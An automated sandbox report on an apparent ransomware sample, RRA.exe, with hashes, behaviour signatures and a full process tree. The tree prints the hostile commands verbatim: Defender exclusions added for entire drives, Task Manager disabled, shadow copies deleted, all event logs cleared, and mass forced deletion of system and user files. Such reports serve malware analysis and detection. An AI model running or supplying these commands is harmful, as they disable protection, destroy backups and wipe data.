Analysis
-
max time kernel
300s -
max time network
253s -
platform
windows11_x64 -
resource
win11 -
submitted
14-08-2021 07:36
General
-
Target
RRA.exe
-
Size
12.8MB
-
MD5
8cfd8faa312373f96567891afd0344ef
-
SHA1
3b232e440c87cbb6e1e8abe6d085954cd6e527fc
-
SHA256
8a1a2c3f4e0f611c0066c53c9d2f65a8f453c911afab5421bcc9ff3b1a1958d9
-
SHA512
9e58f9e2d4ce5e6076ff06c1179d613ddb75465ca5bfbeaaf9ff4c7f839675e3feaec85a59782fb71a560a33ec27db29ee1d153b16d0514803d15e218e334fee
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Loads dropped DLL 22 IoCs
-
Drops desktop.ini file(s) 59 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RRA.exe"C:\Users\Admin\AppData\Local\Temp\RRA.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RRA.exe"C:\Users\Admin\AppData\Local\Temp\RRA.exe"2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "nslookup myip.opendns.com resolver1.opendns.com"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionExtension exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -Force -ExclusionExtension exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionExtension py"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -Force -ExclusionExtension py4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionPath C:\"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -Force -ExclusionPath C:\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -Force -ExclusionPath D:\"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -Force -ExclusionPath D:\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "vssadmin delete shadows /all /quiet"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\win32cryp.dll"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Boot\BCD""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Boot\BCD"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\BCD.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Boot\BCD.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Program Files\desktop.ini.rs"4⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini.rs"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Program Files\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.0.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Program Files (x86)\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Program Files (x86)\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\$Recycle.Bin\S-1-5-18\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\$Recycle.Bin\S-1-5-18\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft OneDrive\setup\refcount.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Boot\BCD""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Program Files (x86)\desktop.ini.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\DESIGNER\MSADDNDR.OLB""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\$Recycle.Bin\S-1-5-18\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\$Recycle.Bin\S-1-5-18\desktop.ini.rs"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\odt\config.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\addins\FXSEXT.ecf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Contacts\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Contacts\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Contacts\desktop.ini.rs"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Contacts\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\appcompat\appraiser\APPRAISER_TelemetryBaseline_UNV.bin""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Desktop\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\VSTOInstallerUI.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl.003""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Desktop\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bcastdvr\broadcastpause720.h264""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.stdformat.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\AspNetMMCExt\2.0.0.0__b03f5f7f11d50a3a\AspNetMMCExt.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\c0fb350c4beedf03c6b66e11606d704a\Microsoft.ApplicationId.RuleWizard.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\msinfo32.exe.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b07944c8660c1ae1c12b65abb5b81559\Microsoft.Dtc.PowerShell.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\28f99753c66a6bdafe49d6671a58883f\Microsoft.ApplicationId.Framework.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\4e3cf34e778a3e19c441eb0110f744bf\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\1cf2958f3d5e8e0b0fb26a6dc3d5a6cc\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\IEHost\2.0.0.0__b03f5f7f11d50a3a\IEHost.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C99be4d25#\97605d8f331365dca8419768231e1959\Microsoft.ConfigCI.Commands.ni.dll""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\System.Printing\3.0.0.0__31bf3856ad364e35\System.Printing.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\3aff77d8bef09e57b94ccb6a80866819\Microsoft.Isam.Esent.Interop.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e1c243c2d74f251193b33ee487953c18\Microsoft.Isam.Esent.Interop.Wsa.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\msinfo32.exe.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\5d6d5b5d546ae1095913a04bc8e66010\Microsoft.GroupPolicy.Interop.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\odt\office2016setup.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\a0efb4309fa0f9874cac236effbb8dc4\Microsoft.PowerShell.Diagnostics.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\0ecdf8db179adc1cb03ae3198c50c366\Microsoft.PowerShell.Commands.Diagnostics.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v3.5.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07222021-031535-7-1ff-22000.1.amd64fre.co_release.210604-1628.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\3082da847999c115f6877fc362b1ebba\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\978615d39859ab304afb26b47035fe2b\Microsoft.GroupPolicy.Reporting.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\USOShared\Logs\User\MoNotificationUx.192108e1-a032-4519-a974-64faedbb5b67.1.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-file-l2-1-0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\131645e1eec24dbdeee9d322d4fe701e\Microsoft.InternationalSettings.Commands.ni.dll""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.vol""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\Are.docx.LNK""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pidgenx.dll""3⤵
-
